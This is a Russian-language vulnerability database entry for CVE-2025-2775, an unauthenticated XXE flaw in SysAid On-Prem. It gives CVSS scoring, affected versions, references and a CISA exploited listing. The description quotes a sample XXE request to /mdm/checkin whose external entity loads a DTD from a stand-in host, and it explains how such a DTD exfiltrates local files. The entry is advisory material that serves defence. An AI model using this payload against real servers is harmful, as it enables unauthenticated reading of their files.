CVE-2025-2775
Оценки
EPSS
Процентиль: 69.8%
CVSS
Оценка CVSS: 7.5/10
Все оценки CVSS
Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Разбор вектора
CVSS (Common Vulnerability Scoring System) вектор предоставляет детальные метрики о характеристиках уязвимости
CVSS
Вектор атаки
Сеть (N)
Описывает способ эксплуатации уязвимости
Сложность атаки
Низкая (L)
Описывает условия, не зависящие от атакующего
Требуемые привилегии
Отсутствуют (N)
Описывает уровень привилегий, которыми должен обладать атакующий
Взаимодействие с пользователем
Отсутствует (N)
Отражает требование участия человека в атаке
Область воздействия
Неизменная (U)
Определяет, влияет ли успешная атака на компоненты за пределами уязвимого компонента
Воздействие на конфиденциальность
Высокое (H)
Измеряет воздействие на конфиденциальность информации
Воздействие на целостность
Отсутствует (N)
Измеряет воздействие на целостность при успешной эксплуатации уязвимости
Воздействие на доступность
Отсутствует (N)
Измеряет воздействие на доступность затронутого компонента
Описание
Версии SysAid On-Prem <= 23.3.40 уязвимы к атаке XXE (XML External Entity) без аутентификации в функциональности Checkin, что позволяет захватить административный аккаунт и получить примитивы чтения файлов [1].
Уязвимость возникает из-за отсутствия надлежащей проверки и санитаризации пользовательского ввода в методе doPost класса GetMdmMessage. Атакующий может отправить специально сформированный XML-документ, содержащий внешнюю сущность, что приводит к XXE-атаке. Это позволяет злоумышленнику извлекать содержимое локальных файлов или взаимодействовать со службами внутренней сети. В частности, были обнаружены три вектора XXE-атаки: через endpoints /mdm/checkin, /mdm/serverurl и /lshw [2].
Для эксплуатации уязвимости атакующий может отправить POST-запрос на уязвимый endpoint с вредоносным XML-содержимым. Например, запрос к /mdm/checkin с заголовком Content-Type: application/xml и телом:
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd">
%foo;
]>
Это приводит к тому, что сервер выполняет запрос к внешней DTD, что подтверждает наличие уязвимости. Используя эту уязвимость, атакующий может извлекать содержимое локальных файлов, таких как C:\windows\win.ini, путем использования внешней DTD для exfiltrации данных [1].
Однако было замечено, что полная exfiltrация содержимого файла возможна только для однострочных файлов из-за ограничений в обработке XML-сущностей в Java. Для обхода этого ограничения может быть использован метод error-based XXE, но в данном случае XXE является полностью слепой [2].
Кроме того, злоумышленник может попытаться использовать XXE для взаимодействия со внутренними службами, хотя в данном случае это не привело к повышению привилегий или выполнению команд [1].
Исправление уязвимости требует обновления до исправленной версии SysAid.
Источники:
- [1] https://documentation.sysaid.com/docs/24-40-60
- [2] https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
Сканер-ВС 7 — современное решение для управления уязвимостями
Источники
CWE
Связанные уязвимости
Эксплойты
ID эксплойта: CVE-2025-2775
Источник: cisa
URL: https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Уязвимое ПО (1)
Тип: Конфигурация
Поставщик: *
Продукт: sysaid
Операционная система: * * *
{ "cpe_match": [ { "cpe23uri": "cpe:2.3:a:sysaid:sysaid:*:*:*:*:on-premises:*:*:*", "versionEndIncluding": "23.3.40", "vulnerable": true } ], "operator": "OR"}
Источник: nvd